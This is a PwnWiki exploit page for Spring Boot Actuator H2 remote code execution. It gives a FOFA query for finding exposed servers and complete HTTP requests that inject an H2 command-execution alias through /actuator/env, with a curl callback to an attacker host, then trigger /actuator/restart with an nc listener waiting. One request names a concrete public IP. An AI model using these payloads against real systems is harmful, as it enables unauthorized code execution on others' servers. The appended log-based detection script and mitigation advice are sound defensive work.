Spring Boot Actuator H2 RCE Vulnerability

From PwnWiki
Revision as of 09:27, 13 June 2021 by Pwnwiki

Affected versions

Spring Boot < 1.5
Spring Boot >= 1.5

FOFA

body="Whitelabel Error Page"

Exploitation

Visit the following URL:

http://x.x.x.x:port/actuator

Send the following POST request to set the value of spring.datasource.hikari.connection-test-query.

POST /actuator/env HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/json
Content-Length: 389

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl x.x.x.x:port');"}

Start an nc listener, then send a POST request to the /actuator/restart endpoint to restart the application.

POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 356

{}
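From the defender's side, the two-step sequence above (a POST that writes a datasource property to the env endpoint, followed shortly by a POST to the restart endpoint from the same client) is easy to spot in the access logs of the reverse proxy in front of the application. The script below is an added detection example, not part of the original page; the log lines are constructed, and the un-prefixed /env and /restart paths are included on the assumption that older Spring Boot 1.x deployments expose actuator endpoints at the root.

```python
import re
from datetime import datetime, timedelta

# Combined-log-format line, as written by Nginx/Apache in front of the app.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Endpoints abused in the write-up: a property write, then an app restart.
# Root-level paths are an assumption for Spring Boot 1.x deployments.
WRITE_ENDPOINTS = {"/actuator/env", "/env"}
RESTART_ENDPOINTS = {"/actuator/restart", "/restart"}

def parse(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], TS_FMT)
    d["path"] = d["path"].split("?", 1)[0].rstrip("/") or "/"
    return d

def detect_actuator_abuse(lines, window=timedelta(minutes=10)):
    """Return findings as (client_ip, severity, description) tuples."""
    findings = []
    env_writes = {}  # client ip -> timestamp of its last POST to an env endpoint
    for line in lines:
        r = parse(line)
        if r is None or r["method"] != "POST":
            continue
        if r["path"] in WRITE_ENDPOINTS:
            env_writes[r["ip"]] = r["ts"]
            findings.append((r["ip"], "medium", "POST to env endpoint (property write)"))
        elif r["path"] in RESTART_ENDPOINTS:
            last = env_writes.get(r["ip"])
            if last is not None and r["ts"] - last <= window:
                findings.append((r["ip"], "high", "env write followed by restart"))
            else:
                findings.append((r["ip"], "medium", "POST to restart endpoint"))
    return findings

# Constructed sample log lines (not real traffic) exercising the rule.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Jun/2021:09:20:01 +0000] "GET /actuator/health HTTP/1.1" 200 15',
    '10.0.0.9 - - [13/Jun/2021:09:25:10 +0000] "GET /actuator HTTP/1.1" 200 2301',
    '10.0.0.9 - - [13/Jun/2021:09:25:40 +0000] "POST /actuator/env HTTP/1.1" 200 0',
    '10.0.0.9 - - [13/Jun/2021:09:26:05 +0000] "POST /actuator/restart HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in detect_actuator_abuse(SAMPLE_LOG):
        print(*finding)
```

The mitigation the detection points at is the same in every version: do not expose the env and restart endpoints without authentication, and keep management endpoints off the public interface.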